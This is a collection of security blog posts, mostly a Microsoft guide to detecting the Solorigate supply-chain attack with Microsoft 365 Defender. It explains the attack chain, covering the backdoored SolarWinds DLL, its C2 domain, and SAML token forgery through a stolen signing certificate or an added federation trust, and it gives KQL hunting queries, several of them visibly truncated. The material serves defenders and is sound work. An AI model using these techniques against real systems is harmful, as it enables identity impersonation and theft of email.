Learn more about the Forcepoint products that integrate with Microsoft Azure, including the technical implementation and demonstrations of how Forcepoint risk adaptive protection influences the conditional access policies of a potentially compromised user:

Give your organization the control it needs to protect critical assets and data by combining Forcepoint with the power of Azure AD today.

About Forcepoint

Forcepoint is a leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with networks, data, and systems. Forcepoint provides secure access solutions without compromising employee productivity. For more information, visit

Forcepoint is a member of the Microsoft Intelligent Security Association.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

For more information about Microsoft Security Solutions, visit the Microsoft Security website. Bookmark the Security blog to keep up with our expert coverage of security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Forcepoint and Microsoft: Risk-based access control for the remote workforce appeared first on Microsoft Security.

4 Ways to Help Your Family Combat Cyber Threats in the New Year

New Years 2021

No doubt, we have a lot to be hopeful for as we step into the New Year. We’ve adapted, survived, and learned to thrive under extraordinary circumstances. While faced with plenty of challenges, families successfully transitioned to working and learning from home like pros. So, as we set our intentions for 2021, we will need that same resolve to tackle growing cyber threats.

The good news: With a COVID-19 vaccine making its debut, we’re trusting there’s an end in sight to the pandemic of 2020, which may help curb a lot of our emotional as well as digital stressors.

The not-so-good-news: According to McAfee’s latest Quarterly Threat Report, pandemic-themed threats that began in 2020 will continue, specifically, phishing and malware scams targeting people working from home. According to the recent report, bad actors are especially taking advantage of the mass remote workforces.

According to Raj Samani, McAfee Fellow and Chief Scientist, “What began as a trickle of phishing campaigns and the occasional malicious app quickly turned into a deluge of malicious URLs, attacks on cloud users and capable threat actors leveraging the world’s thirst for more information on COVID-19 as an entry mechanism into systems across the globe.”

This report points inspires a few best practices for families as we launch a new year: Stay informed and keep talking about the threats and — as grandma might advise — dress in layers to protect against the elements (in this case, digital threats).

Safe Family Tips

  1. Information is power.The best defense against online threats is a good offense, which is the digital space means staying informed. The more you know about how hackers exploit consumers, the more you can dodge shady phishing scams such as emails trying to sell you the COVID-19 vaccine online or a voucher allowing you to skip the vaccination line.
  2. Verify email sources.Be skeptical of emails or text messages claiming to be from people you know or organizations with requests or offers that seem too good to be true. Before you click, go straight to the organization’s website or contact customer service. Verifying sources will help you steer clear of downloading malicious content from phishing links. Remind family members to keep their guards up and never to share personal information.
  3. Hover over links, scrutinize URLs.If someone sends you a message with a link, hover over the link without clicking on it. This will allow you to see a link preview. If the URL looks suspicious, delete the message. A few red flags: Fake links generally imitate established websites but may include unnecessary words and domains in the address. When in doubt about a link’s validity — don’t click.
  4. Think in layers.When it comes to cybersecurity for the new year, try thinking (or dressing) your devices in layers. A few ways to layer up:

• Use 2FA passwords. Regularly changing passwords and adding two-factor authentication (2FA) is proving to be the most effective way to thwart hackers. If you work from home, 2FA is a more secure way to access work applications. This password/username combo requires you to verify who you are with a personal device only you own puts an extra barrier between your data and a creative hacker.

• Use a VPN. If you travel or choose to work in a coffee shop, a Virtual Private Network (VPN) will give your family an encrypted channel that shields your online activity from hackers.

• Security software. If you’ve been cobbling your security plan together, consider one comprehensive security solution to help protect you from malware, phishing attacks, and viruses. Leading products such as McAfee Total protection will include safe browsing and a VPN.

The past year, while difficult, also gave us several gifts to carry into 2021. For families, it connected us with our resilience and creativity. It made us wiser, braver, and more ready for the challenges ahead, be they online or within the ebb and flow of everyday life. That’s something we can all celebrate.


The post 4 Ways to Help Your Family Combat Cyber Threats in the New Year appeared first on McAfee Blogs.

Trends in IT-Security and IAM in 2021, the “New Normal” and beyond

Article by Dennis Okpara, Chief Security Architect & DPO at IDEE GmbH

Yes, there is hope for 2021, but the challenges of the “New Normal” are here to stay. CISOs have to prepare and start acting now, because cybersecurity and the IT-infrastructure will have to face threats that have only just started.

The year 2020 was the year working from home lost its oddity status and became normality. Big names like Google and Twitter are planning long-term and hold out the prospect of working from home on a permanent basis. More than 60 percent of companies are trying the same and have implemented home office policies in 2020. But with great flexibility comes great responsibility: Everyone responsible for Cybersecurity and a secure IT infrastructure is now dealing with new challenges closing the last gaps and weak points when it comes to allowing access to company resources. Dennis Okpara, Chief Security Architect & DPO at IDEE GmbH, the specialist for secure identity access management (IAM), authentication and authorization, shows the top 3 issues CISOs have to look out for:

1. The Problem with Insider Threats will only get Worse
With more and more people working from home, the use of personal devices and working on private networks only increases and further fuels the risk of insider threats. This does not come as a surprise. As early as in 2018, Verizon's Data Breach Investigation Report already recorded an increase in threats from "internal actors," meaning employees who knowingly or unknowingly illegally disseminated data and other company information. According to the 2020 report, insiders were responsible for a data breach in a flabbergasting 30% of cases.

The case of Twitter in the summer of 2020 illustrates the damage vividly an insider threat can create. Hackers used social engineering to exploit the insecurity of IT employees and thus gain access to internal systems. Of course, it is quite unlikely that any of Twitter’s employees acted with malicious intent, still, they became the tool for an attack. The result: although the ATOs (Account Take Over) was used for fairly obvious scam posts, the attackers captured well over $100,000.

No company is immune to such attacks, and even strict cybersecurity policies have little effect because they are very difficult to enforce or monitor when people are working from home. Therefore, it can be assumed that the number of insider threats will increase by more than 20% in 2021.

2. Ransomware and Shadow-IT are bound to become the CISOs nightmare
Working from home came suddenly for most companies and pretty much overnight, and even still, most corporations are not sufficiently prepared for the challenges that lie ahead. Unlike in the office, where the IT department can reasonably reliably control the distribution of software on employee PCs, the use of home networks and private devices opens up new attack vectors for hackers.

Employees often use third-party services, download free software, or use private cloud services as a workaround when corporate services are not available. The storage of documents, access to data or other sensitive information on private devices will also continue to increase without CISOs being able to control this. Since private devices and networks are usually inadequately protected, they serve as a gateway for ransomware, which then attacks corporate networks, encrypts data and extorts high ransoms. Gartner analysts have already predicted a 700% increase in 2017 - the growth from the New Normal will dwarf those numbers and give CISOs many sleepless nights. Due to system and network vulnerabilities, misconfigurations, phishing, and the increase in credential attacks, we will likely see an exponential increase in ransomware attacks in 2021.

3. Mobile Devices Become a Favourite Target for Hackers
Developments such as multi-factor authentication (MFA) is improving the security of access to corporate services. On the flip side, it has put mobile devices in the crosshair of hackers. As smartphones are now practical for almost all online activities, the number of attack vectors has grown steadily along with them. In addition to malware, which can be easily installed via third-party apps, especially on Android, and data manipulation or the exploitation of recovery vulnerabilities (such as the interception of magic links or PIN text messages), social engineering is a particularly popular field here.

In addition to the widespread phishing e-mail, vishing (manipulation of employees by fictitious calls from IT staff) and smishing (which works similarly to phishing but uses SMS instead of e-mail) will increase sharply. Hackers will come up with new tricks to compromise mobile devices, and that can only make digital fraud worse.

2021: The Year We Abolish Trust
In a year in which we will have to learn a lot of things anew, CISOs are well-advised to not build anything on trust – neither their network infrastructure nor their IAM. Zero-trust architectures that question all access to corporate resources must become the standard in the age of the New Normal. Restricting resource access to a physical address or IP address, or to VPN access, is counterproductive and difficult to manage if employees are to work from remote locations. Digital identity will shift from user identity to the combined identity of the device and the user. Only this will enable modern and secure identity & access management.

Using Microsoft 365 Defender to protect against Solorigate

Microsoft security researchers continue to investigate and respond to the sophisticated cyberattack known as Solorigate (also referred to as Sunburst by FireEye) involving a supply chain compromise and the subsequent compromise of cloud assets. While the related investigations and impact assessments are ongoing, Microsoft is providing visibility into the attack chains and related threat intelligence to the defender community as early as possible so organizations can identify and take action to stop this attack, understand the potential scope of its impact, and begin the recovery process from this active threat. We have established a resource center that is constantly updated as more information becomes available at

This blog is a comprehensive guide for security operations and incident response teams using Microsoft 365 Defender to identify, investigate, and respond to the Solorigate attack if it’s found in your environment. The description of the attack in this blog is based on current analysis and investigations by researchers across Microsoft, our partners, and the intelligence community who are actively collaborating to respond to the attack. This is an active threat that continues to evolve, and the findings included here represent what we know at the time of publishing. We continue to publish and update intelligence, indicators, tactics, techniques, and procedures (TTPs), and related details as we discover them. The report from the Microsoft Security Response Center (MSRC) includes the latest analysis of this threat, known indicators of compromise (IOCs), and initial recommended defenses, and will be updated as new data becomes available.

This blog covers:

Tracking the cross-domain Solorigate attack from endpoint to the cloud

The Solorigate attack is an example of a modern cross-domain compromise. Since these kinds of attacks span multiple domains, having visibility into the entire scope of the attack is key to stopping and preventing its spread.

This attack features a sophisticated technique involving a software supply chain compromise that allowed attackers to introduce malicious code into signed binaries on the SolarWinds Orion Platform, a popular IT management software. The compromised application grants attackers “free” and easy deployment across a wide range of organizations who use and regularly update the application, with little risk of detection because the signed application and binaries are common and are considered trusted. With this initial widespread foothold, the attackers can then pick and choose the specific organizations they want to continue operating within (while others remain an option at any point as long as the backdoor is installed and undetected). Based on our investigations, the next stages of the attack involve on-premises activity with the goal of off-premises access to cloud resources through the following steps:

  1. Using the compromised SolarWinds DLL to activate a backdoor that enables attackers to remotely control and operate on a device
  2. Using the backdoor access to steal credentials, escalate privileges, and move laterally to gain the ability to create valid SAML tokens using any of two methods:
    1. Stealing the SAML signing certificate (Path 1)
    2. Adding to or modifying existing federation trust (Path 2)
  3. Using attacker-created SAML tokens to access cloud resources and perform actions leading to the exfiltration of emails and persistence in the cloud

Diagram of the high-level Solorigate attack chain

Figure 1. High-level end-to-end Solorigate attack chain

This attack is an advanced and stealthy campaign with the ability to blend in, which could allow attackers to stay under the radar for long periods of time before being detected. The deeply integrated cross-domain security capabilities in Microsoft 365 Defender can empower organizations and their security operations (SOC) teams to uncover this attack, scope out the end-to-end breach from endpoint to the cloud, and take action to block and remediate it. This blog will offer step-by-step guidance to do this by outlining:

  • How indicators of attack show up across endpoints, identity, and the cloud
  • How Microsoft 365 Defender automatically combines alerts across these different domains into a comprehensive end-to-end story
  • How to leverage the powerful toolset available for deep investigation, hunting, and response to enable SOCs to battle the attackers and evict these attackers from both on-premises and cloud environments

Threat analytics: Understanding and responding to active attacks

As soon as this attack was discovered, Microsoft researchers published two threat analytics reports to help organizations determine if they are affected, assess the impact of the attack, and identify actions to contain it.

The reports are published in Microsoft 365 security center, available to all Microsoft Defender for Endpoint customers and Microsoft 365 Defender early adopters. In addition to detailed descriptions of the attack, TTPs, and indicators of compromise (IoCs), the reports provide real-time data aggregated from signals across Microsoft 365 Defender, indicating the all-up impact of the threat to the organization, as well as details about relevant incidents and alerts to initiate investigation on. These reports continue to be updated as additional information becomes available.

Given the significance of this threat, we are making similar relevant Microsoft threat intelligence data, including the updated list of IOCs, available to everyone publicly.  A comprehensive list of guidance and insights is available at

Screenshot of threat analytics report on Soloriage in Microsoft Defender Security Center

Figure 2. Threat analytics report on Solorigate attack

We recommend Microsoft 365 Defender customers to start their investigations here. After gaining deep understanding of the threat and getting the latest research findings, you can take the following recommended steps:

Find devices with the compromised SolarWinds Orion application

The threat analytics report uses insights from threat and vulnerability management to identify devices that have the compromised SolarWinds Orion Platform binaries or are exposed to the attack due to misconfiguration.

From the Vulnerability patching status chart in threat analytics, you can view the mitigation details to see a list of devices with the vulnerability ID TVM-2020-0002, which was added specifically to help with Solorigate investigations:

Threat and vulnerability management insights on impact of Solorigate

Figure 3. Threat and vulnerability management data shows data on exposed devices

Threat and vulnerability management provides more info about the vulnerability ID TVM-2020-0002, as well as all relevant applications, via the Software inventory view. There are also multiple security recommendations to address this specific threat, including instructions to update the software versions installed on exposed devices.

Screenshot of security recommendations for Solorigate in Microsoft Defender Security Center

Figure 4. Security recommendations from threat and vulnerability management

Investigate related alerts and incidents

From the threat analytics report, you can quickly locate devices with alerts related to the attack. The Devices with alerts chart identifies devices with malicious components or activities known to be directly related to Solorigate. Click through to get the list of alerts and investigate.

Some Solorigate activities may not be directly tied to this specific threat but will trigger alerts due to generally suspicious or malicious behaviors. All alerts in Microsoft 365 Defender provided by different Microsoft 365 products are correlated into incidents. Incidents help you see the relationship between detected activities, better understand the end-to-end picture of the attack, and investigate, contain, and remediate the threat in a consolidated manner.

Review incidents in the Incidents queue and look for those with alerts relevant to this attacker’s TTPs, as described in the threat analytics report (also listed at the end of this blog).

Screenshot of Microsoft Defender Security Center incidents view for Solorigate

Figure 5. Consolidated Incident view for Solorigate

Some alerts are specially tagged with Microsoft Threat Experts to indicate malicious activities that Microsoft researchers found in customer environments during hunting. As part of the Microsoft Threat Experts service, researchers investigated this attack as it unfolded, hunting for associated attacker behaviors, and sent targeted attack notifications. If you see an alert tagged with Microsoft Threat Experts, we strongly recommend that you give it immediate attention.

Screenshot of Microsoft Defender Security Center showing Microsoft Threat Experts detections

Figure 6. Microsoft Threat Experts targeted attack notification

Additionally, Microsoft Threat Experts customers with Experts on demand subscriptions can reach out directly to our on-demand hunters for additional help in understanding the Solorigate threat and the scope of its impact in their environments.

Hunt for related attacker activity

The threat analytics report also provides advanced hunting queries that can help analysts locate additional related or similar activities across endpoint, identity, and cloud. Advanced hunting uses a rich set of data sources, but in response to Solorigate, Microsoft has enabled streaming of Azure Active Directory (Azure AD) audit logs into advanced hunting, available for all customers in public preview. These logs provide traceability for all changes done by various features within Azure AD. Examples of audit logs include changes made to any resources within Azure AD, such as adding or removing users, apps, groups, roles, and policies.  Customers who do not have Microsoft Defender for Endpoint or are not early adopters for Microsoft 365 Defender can see our recommended advanced hunting queries.

Currently, this data is available to customers who have Microsoft Cloud App Security with the Office365 connector. Our intent is to expand availability to more Microsoft 365 Defender customers. The new log data is available in the CloudAppEvents table:

| where Application == “Office 365”

The log data contains activity logs useful for investigating and finding Azure AD-related activities. This data further enriches the CloudAppEvents table, which also has Exchange Online and Microsoft Teams activities.

As part of making this new data available, we also published a handful of relevant advanced hunting queries, identified by the suffix [Solorigate], to the GitHub repo.

Here’s an example query that helps you see when credentials are added to an Azure AD application after ‘Admin Consent’ permissions were granted:

| where Application == “Office 365”
| where ActionType == “Consent to application.”
| where RawEventData.ModifiedProperties[0].Name == “ConsentContext.IsAdminConsent” and RawEventData.ModifiedProperties[0].NewValue == “True”
| extend spnID = tostring(RawEventData.Target[3].ID)
| parse RawEventData.ModifiedProperties[4].NewValue with * “=> [[” dummpy “Scope: ” After “]]” *
| extend PermissionsGranted = split(After, “]”,0)
| project ConsentTime = Timestamp , AccountDisplayName , spnID , PermissionsGranted
| join (
| where Application == “Office 365”
| where ActionType == “Add service principal credentials.” or ActionType == “Update application – Certificates and secrets management “
| extend spnID = tostring(RawEventData.Target[3].ID)
| project AddSecretTime = Timestamp, AccountDisplayName , spnID
) on spnID
| where ConsentTime < AddSecretTime and AccountDisplayName <> AccountDisplayName1

Microsoft 356 Defender advanced hunting can also assist in many of the recommended incident investigation tasks outlined in the blog, Advice for incident responders on recovery from systemic identity compromises.

In the remaining sections, we will discuss select examples of alerts raised by Microsoft 365 solutions that monitor and detect Solorigate activities across the attack chain on endpoint, identity, and the cloud. These are alerts you may encounter when investigating incidents in Microsoft 365 security center if your organization is affected by this threat. We will also indicate activities which are now blocked by Microsoft 365 Defender. Lastly, each section contains examples of hunting queries you will find useful for hunting for various attacker activities in your environment.

Detecting and blocking malware and malicious behavior on endpoints

Diagram showing attack chain on endpoints involving the Solorigate malware

Figure 7. Solorigate attack chain: Initial access and command-and-control

Discovering and blocking backdoor activity

When the compromised SolarWinds binary SolarWinds.Orion.Core.BusinessLayer.dll gets loaded on a device through normal update channels, the backdoor goes through an extensive list of checks to ensure it’s running in an actual enterprise network and not on an analyst’s machine. It then contacts a command-and-control (C2) server using a subdomain that is generated partly with information gathered from the affected device, which means a unique subdomain is generated for each affected domain. The backdoor allows the attackers to remotely run commands on the device and move to the next stages of the attack. For more information, read our in-depth analysis of the Solorigate malware.

Microsoft Defender for Endpoint delivers comprehensive protection against this threat (see full list of detection and protection alerts at the end of this blog). Microsoft Defender Antivirus, the default antimalware solution on Windows 10, detects and blocks the malicious DLL and its behaviors. It quarantines the malware, even if the process is running.

Screenshot of Microsoft Defender Security Center showing alert for blocking of Solorigate malware

Figure 8. Microsoft Defender for Endpoint blocks malicious binaries

If the malicious code is successfully deployed, the backdoor lies dormant for up to two weeks. It then attempts to contact numerous C2 domains, with the primary domain being *.avsvmcloud[.]com. The backdoor uses a domain generation algorithm to evade detection. Microsoft 365 Defender detects and blocks this behavior.

Screenshot of Microsoft Defender Security Center showing alert for malicious network connection

Figure 9. Microsoft Defender for Endpoint prevented malicious C2 callback

Discovering potentially tampered devices

To evade security software and analyst tools, the Solorigate malware enumerates the target system looking for certain running processes, loaded drivers, and registry keys, with the goal of disabling them.

The Microsoft Defender for Endpoint sensor is one of the processes the malware attempts to disable. Microsoft Defender for Endpoint has built-in protections against many techniques attackers use to disable endpoint sensors ranging from hardened OS protection, anti-tampering policies, and detections for a variety of tampering attempts, including “Attempt to stop Microsoft Defender for Endpoint sensor”, “Tampering with Microsoft Defender for Endpoint sensor settings”, or “Possible sensor tampering in memory”.

Successfully disabling Microsoft Defender for Endpoint can prevent the system from reporting observed activities. However, the multitude of signals reported into Microsoft 365 Defender provides a unique opportunity to hunt for systems where the tampering technique used might have been successful. The following advanced hunting query can be used to locate devices that should be reporting but aren’t:

// Times to be modified as appropriate
let timeAgo=1d;
let silenceTime=8h;
// Get all silent devices and IPs from network events
let allNetwork=materialize(DeviceNetworkEvents
| where Timestamp > ago(timeAgo)
and isnotempty(LocalIP)
and isnotempty(RemoteIP)
and ActionType in (“ConnectionSuccess”, “InboundConnectionAccepted”)
and LocalIP !in (“”, “::1”)
| project DeviceId, Timestamp, LocalIP, RemoteIP, ReportId);
let nonSilentDevices=allNetwork
| where Timestamp > ago(silenceTime)
| union (DeviceProcessEvents | where Timestamp > ago(silenceTime))
| summarize by DeviceId;
let nonSilentIPs=allNetwork
| where Timestamp > ago(silenceTime)
| summarize by LocalIP;
let silentDevices=allNetwork
| where DeviceId !in (nonSilentDevices)
and LocalIP !in (nonSilentIPs)
| project DeviceId, LocalIP, Timestamp, ReportId;
// Get all remote IPs that were recently active
let addressesDuringSilence=allNetwork
| where Timestamp > ago(silenceTime)
| summarize by RemoteIP;
// Potentially disconnected devices were connected but are silent
| where LocalIP in (addressesDuringSilence)
| summarize ReportId=arg_max(Timestamp, ReportId), Timestamp=max(Timestamp), LocalIP=arg_max(Timestamp, LocalIP) by DeviceId
| project DeviceId, ReportId=ReportId1, Timestamp, LocalIP=LocalIP1

Microsoft is continuously developing additional measures to both block and alert on these types of tampering activities.

Detecting hands-on-keyboard activity within an on-premises environment

Diagram showing Solorigate hands-on-keyboard attack on premises

Figure 10. Solorigate attack chain: Hands-on-keyboard attack on premises

After establishing a backdoor connection on an affected device, the attacker’s next goal is to achieve off-premises access to the organization’s cloud services. To do this, they must find a way to gain permissions to those services. One technique we have seen the attackers use is to go after the organization’s Active Directory Federation Services (AD FS) server to obtain the proverbial “keys” to the identity kingdom. AD FS enables federated identity and access management by securely sharing digital identity and entitlement rights across security and enterprise boundaries; effectively, it is the “LSASS for the cloud.” Among other things, AD FS stores the Security Assertion Markup Language (SAML) token signing certificate, which is used to create authorization tokens for users or services in the organization so they can access cloud applications and resources after authentication.

To attack the AD FS infrastructure, the attackers must first obtain appropriate domain permissions through on-premises intelligence gathering, lateral movement, and credential theft. Building from the backdoor described above, the attackers leverage fileless techniques for privilege escalation, persistence, and lateral movement, including evading analysis by using system binaries and exploration tools that masquerade as other benign binaries. The attackers also carefully chose organization-specific command-and-control (C2) domains and use custom organization-specific tool naming and locations.

Microsoft Defender for Endpoint detects a wide array of these attack techniques, allowing SOC teams to track the attacker’s actions in the environment and take actions to contain the attack. The following section covers detections for the techniques used by the attackers to compromise the AD FS infrastructure.

Identifying attacker reconnaissance

Attackers collect data from Active Directory using a renamed version of the utility ADFind, running queries against Domain Controllers as part of the reconnaissance stage of the attack. Microsoft Defender for Endpoint detects this behavior and allows the SOC analyst to track compromised devices at this stage to gain visibility into the information the attacker is looking for.

Screenshot of Microsoft Defender Security Center alert for detection of exploration tools

Figure 11. Microsoft Defender for Endpoint detects usage of masquerading exploration tools

Screenshot of Microsoft Defender Security Center alert for detection of LDAP queries

Figure 12. Microsoft Defender for Endpoint detects usage LDAP query for reconnaissance.

Stopping lateral movement and credential theft

To gain access to a highly privileged account needed for later steps in the kill chain, the attackers move laterally between devices and dump credentials until an account with the needed privileges is compromised, all while remaining as stealthy as possible.

A variety of credential theft methods, such as dumping LSASS memory, are detected and blocked by Microsoft Defender for Endpoint. The example below shows the detection of lateral movement using Windows Management Instrumentation (WMI) to run the attacker’s payload using the Rundll32.exe process.

Screenshot of Microsoft Defender Security Center alert for detection of remote WMI execution

Figure 13. Microsoft Defender for Endpoint alert for suspicious remote WMI execution highlighting the attacker’s device and payload

Microsoft Defender for Identity also detects and raises alerts on a variety of credential theft techniques. In addition to watching for alerts, security analysts can hunt across identity data in Microsoft 365 Defender for signs of identity compromise. Here are a couple of example Microsoft Defender for Identity queries looking for such patterns:

Enumeration of high-value DC assets followed by logon attempts to validate stolen credentials in time proximity

let MaxTime = 1d;
let MinNumberLogon = 5;
//devices attempting enumeration of high-value DC
| where Timestamp > ago(30d)
| where Application == “Active Directory”
| where QueryTarget in (“Read-only Domain Controllers”)
//high-value RODC assets
| project Timestamp, Protocol, Query, DeviceName, AccountUpn
| join kind = innerunique (
//devices trying to logon {MaxTime} after enumeration
| where Timestamp > ago(30d)
| where ActionType == “LogonSuccess”
| project LogonTime = Timestamp, DeviceName, DestinationDeviceName) on DeviceName
| where LogonTime between (Timestamp .. (Timestamp + MaxTime))
| summarize n=dcount(DestinationDeviceName), TargetedDC = makeset(DestinationDeviceName) by Timestamp, Protocol, DeviceName
| where n >= MinNumberLogon

High-volume of LDAP queries in short time filtering for non-DC devices

let Threshold = 12;
let BinTime = 1m;
//approximate list of DC
let listDC=IdentityDirectoryEvents
| where Application == “Active Directory”
| where ActionType == “Directory Services replication”
| summarize by DestinationDeviceName;
| where Timestamp > ago(30d)
//filter out LDAP traffic across DC
| where DeviceName !in (listDC)
| where ActionType == “LDAP query”
| parse Query with * “Search Scope: ” SearchScope “, Base Object:” BaseObject “, Search Filter: ” SearchFilter
| summarize NumberOfDistinctLdapQueries = dcount(SearchFilter) by DeviceName, bin(Timestamp, BinTime)
| where NumberOfDistinctLdapQueries > Threshold

At this point, SOC teams can take containment measures within the Microsoft 365 security center, for example, using indicators to isolate the devices involved and block the remotely executed payload across the environment, as well as mark suspect users as compromised.

Detecting and remediating persistence

Microsoft Defender for Endpoint also detects the advanced defense evasion and masquerading techniques used by the attackers to make their actions as close to normal as possible, such as binding a WMI event filter with a logical consumer to remain persistent. Follow the recommended actions in the alert to remove persistence and prevent the attacker’s payload from loading after reboot.

Screenshot of Microsoft Defender Security Center alert for detection of WMI event filter bound to suspicious consumer

Figure 14. Microsoft Defender for Endpoint alert for WMI event filter bound to a suspicious consumer showing the persistence and the scheduled command line

Catching AD FS compromise and the attacker’s ability to impersonate users in the cloud

The next step in the attack focuses on the AD FS infrastructure and can unfold in two separate paths that lead to the same outcome—the ability to create valid SAML tokens allowing impersonation of users in the cloud:

  • Path 1 – Stealing the SAML signing certificate: After gaining administrative privileges in the organization’s on-premises network, and with access to the AD FS server itself, the attackers access and extract the SAML signing certificate. With this signing certificate, the attackers create valid SAML tokens to access various desired cloud resources as the identity of their choosing.
  • Path 2 – Adding to or modifying existing federation trust: After gaining administrative Azure Active Directory (Azure AD) privileges using compromised credentials, the attackers add their own certificate as a trusted entity in the domain either by adding a new federation trust to an existing tenant or modifying the properties of an existing federation trust. As a result, any SAML token they create and sign will be valid for the identity of their choosing.

In the first path, obtaining the SAML signing certificate normally entails first querying the private encryption key that resides on the AD FS container and then using that key to decrypt the signing certificate. The certificate can then be used to create illicit but valid SAML tokens that allow the actor to impersonate users, enabling them to access enterprise cloud applications and services.

Microsoft Defender for Endpoint and Microsoft Defender for Identity detect the actions that attackers take to steal the encryption key needed to decrypt the SAML signing certificate. Both solutions leverage unique LDAP telemetry to raise high-severity alerts highlighting the attacker’s progress towards creating illicit SAML tokens.

Screenshot of Microsoft Defender Security Center alert for LDAP query and AD FS private key extraction 

Figure 15. Microsoft Defender for Endpoint detects a suspicious LDAP query being launched and an attempted AD FS private key extraction

Figure 16. Microsoft Defender for Identity detects private key extraction via malicious LDAP requests

For the second path, the attackers create their own SAML signing certificate outside of the organization’s environment. With Azure AD administrative permissions, they then add the new certificate as a trusted object. The following advanced hunting query over Azure AD audit logs shows when domain federation settings are changed, helping to discover where the attackers configured the domain to accept authorization tokens signed by their own signing certificate. As these are rare actions, we advise verifying that any instances identified are the result of legitimate administrative activity.


let auditLookback = 1d; CloudAppEvents
| where Timestamp > ago(auditLookback)
| where ActionType =~ “Set federation settings on domain.”
| extend targetDetails = parse_json(ActivityObjects[1])
| extend targetDisplayName = targetDetails.Name
| extend resultStatus = extractjson(“$.ResultStatus”, tostring(RawEventData), typeof(string))
| project Timestamp, ActionType, InitiatingUserOrApp=AccountDisplayName, targetDisplayName, resultStatus, InitiatingIPAddress=IPAddress, UserAgent

If the SAML signing certificate is confirmed to be compromised or the attacker has added a new one, follow the best practices for invalidating through certificate rotation to prevent further use and creation of SAML tokens by the attacker. Additionally, affected AD FS servers may need to be isolated and remediated to ensure no remaining attacker control or persistence.

If the attackers accomplish either path, they gain the ability to create illicit SAML tokens for the identities of their choosing and bypass multifactor authentication (MFA), since the service or application accepting the token assumes MFA is a necessary previous step in creating a properly signed token. To prevent attackers from progressing to the next stage, which is to access cloud resources, the attack should be discovered and remediated at this stage.

Detecting the hands-on-keyboard activity in the cloud environment

Diagram of hands-on-keyboard attacks in the cloud

Figure 17. Solorigate attack chain: Hands-on-keyboard attack in the cloud

With the ability to create illicit SAML tokens, the attackers can access sensitive data without having to originate from a compromised device or be confined to on-premises persistence. By abusing API access via existing OAuth applications or service principals, they can attempt to blend into the normal pattern of activity, most notably apps or service principals with existing Mail.Read or Mail.ReadWrite permissions to read email content via Microsoft Graph from Exchange Online. If the application does not already have read permissions for emails, then the app may be modified to grant those permissions.

Identifying unusual addition of credentials to an OAuth app

Microsoft Cloud App Security (MCAS) has added new automatic detection of unusual credential additions to an OAuth application to alert SOCs about apps that have been compromised to extract data from the organization. This detection logic is built on an anomaly detection engine that learns from each user in the environment, filtering out normal usage patterns to ensure alerts highlight real attacks and not false positives. If you see this alert in your environment and confirm malicious activity, you should take immediate action to suspend the user, mark the user as compromised, reset the user’s password, and remove the credential additions. You may consider disabling the application during investigation and remediation.

Figure 18. Microsoft Defender Cloud App Security alert for unusual addition of credentials to an OAuth app

SOCs can use the following Microsoft 365 Defender advanced hunting query over Azure AD audit logs to examine when new credentials have been added to a service principle or application. In general, credential changes may be rare depending on the type and use of the service principal or application. SOCs should verify unusual changes with their respective owners to ensure they are the result of legitimate administrative actions.


let auditLookback = 1d; CloudAppEvents
| where Timestamp > ago(auditLookback)
| where ActionType in (“Add service principal.”, “Add service principal credentials.”, “Update application – Certificates and secrets management “)
| extend RawEventData = parse_json(RawEventData)
| where RawEventData.ResultStatus =~ “success”
| where AccountDisplayName has “@”
| extend targetDetails = parse_json(ActivityObjects[1])
| extend targetId = targetDetails.Id
| extend targetType = targetDetails.Type
| extend targetDisplayName = targetDetails.Name
| extend keyEvents = RawEventData.ModifiedProperties
| where keyEvents has “KeyIdentifier=” and keyEvents has “KeyUsage=Verify”
| mvexpand keyEvents
| where keyEvents.Name =~ “KeyDescription”
| parse keyEvents.NewValue with * “KeyIdentifier=” keyIdentifier:string “,KeyType=” keyType:string “,KeyUsage=” keyUsage:string “,DisplayName=” keyDisplayName:string “]” *
| parse keyEvents.OldValue with * “KeyIdentifier=” keyIdentifierOld:string “,KeyType” *
| where keyEvents.OldValue == “[]” or keyIdentifier != keyIdentifierOld
| where keyUsage == “Verify”
| project-away keyEvents
| project Timestamp, ActionType, InitiatingUserOrApp=AccountDisplayName, InitiatingIPAddress=IPAddress, UserAgent, targetDisplayName, targetId, targetType, keyDisplayName, keyType, keyUsage, keyIdentifier

Discovering malicious access to mail items

OAuth applications or service principals with Mail.Read or Mail.ReadWrite permissions can read email content from Exchange Online via the Microsoft Graph. To help increase visibility on these behaviors, the MailItemsAccessed action is now available via the new Exchange mailbox advanced audit functionality. See if this feature is enabled by default for you. Important note for customers: If you have customized the list of audit events you are collecting, you may need to manually enable this telemetry.

If more than 1,000 MailItemsAccessed audit records are generated in less than 24 hours, Exchange Online stops generating auditing records for MailItemsAccessed activity for 24 hours and then resumes logging after this period. This throttling behavior is a good starting point for SOCs to discover potentially compromised mailboxes.


let starttime = 2d;
let endtime = 1d;
| where Timestamp between (startofday(ago(starttime))..startofday(ago(endtime)))
| where ActionType == “MailItemsAccessed”
| where isnotempty(RawEventData[‘ClientAppId’]) and RawEventData[‘OperationProperties’][1] has “True”
| project Timestamp, RawEventData[‘OrganizationId’],AccountObjectId,UserAgent

In addition to looking for throttled telemetry, you can also hunt for OAuth applications reading mail via the Microsoft Graph API whose behavior has changed prior to a baseline period.


//Look for OAuth App reading mail via GraphAPI — that did not read mail via graph API in prior week
let appMailReadActivity = (timeframeStart:datetime, timeframeEnd:datetime) {
| where Timestamp between (timeframeStart .. timeframeEnd)
| where ActionType == “MailItemsAccessed”
| where RawEventData has “00000003-0000-0000-c000-000000000000” // performance check
| extend rawData = parse_json(RawEventData)
| extend AppId = tostring(parse_json(rawData.AppId))
| extend OAuthAppId = tostring(parse_json(rawData.ClientAppId)) // extract OAuthAppId
| summarize by OAuthAppId
appMailReadActivity(ago(1d),now()) // detection period
| join kind = leftanti appMailReadActivity(ago(7d),ago(2d)) // baseline period
on OAuthAppId

Microsoft 365 Defender’s cross-domain XDR correlation enables stronger response to critical security incidents

